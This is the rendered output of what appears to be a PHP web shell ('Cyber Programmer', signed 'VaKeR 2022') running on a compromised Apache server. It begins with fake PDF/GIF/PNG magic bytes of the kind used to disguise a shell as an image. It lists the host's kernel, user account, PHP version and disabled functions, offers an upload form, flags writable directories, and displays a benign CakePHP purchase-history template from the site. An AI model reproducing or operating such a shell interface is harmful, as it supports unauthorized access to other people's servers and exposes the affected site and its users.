%PDF- %GIF98; %PNG; .
Cyber Programmer
Logo of a company Server : Apache
System : Linux host.digitalbabaji.in 4.18.0-513.11.1.el8_9.x86_64 #1 SMP Wed Jan 17 02:00:40 EST 2024 x86_64
User : addictionfreeind ( 1003)
PHP Version : 7.2.34
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/addictionfreeind/www/notification-20230209200437/cgi-bin/src/Template/Users/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/addictionfreeind/www/notification-20230209200437/cgi-bin/src/Template/Users/purchase.ctp
<div class="breadcrumb">
<ul>
<li><?php echo $this->Html->link('Home', array('controller'=>'pages','action'=>'home'),array('escape' => false));?></li>
<li>Purchase History</li>
</ul>
</div>

<div class="row">
<div class="col-lg-12 col-md-12 col-sm-12 col-xs-12">
<div class="wallet-panel">
<h1>Purchase History</h1>
<?php
if(!empty($querypayment))
{
?>	
<table class="table table-bordered" width="100%">
<thead>
<tr>
<th>ORDERID</th>
<TH>TXNID</TH>
<th>BANK TXN ID</th>
<th>DATE</th>
<th>AMOUNT</th>
<th>POINTS</th>
</tr>
</thead>
<tbody>
<?php
foreach ($querypayment as $payment) {
?>	
<tr>
<td><?php echo $payment['orderid'];?></td>
<td><?php echo $payment['txnid'];?></td>
<td><?php echo $payment['banktxnid'];?></td>
<td><?php echo date_format($payment['date'],'Y-m-d');?></td>
<td><?php echo $payment['amount'];?></td>
<td><?php echo $payment['points'];?></td>
</tr>
<?php
}
?>
</tbody>
</table>
<?php
}
?>
</div>
</div>
</div>

VaKeR 2022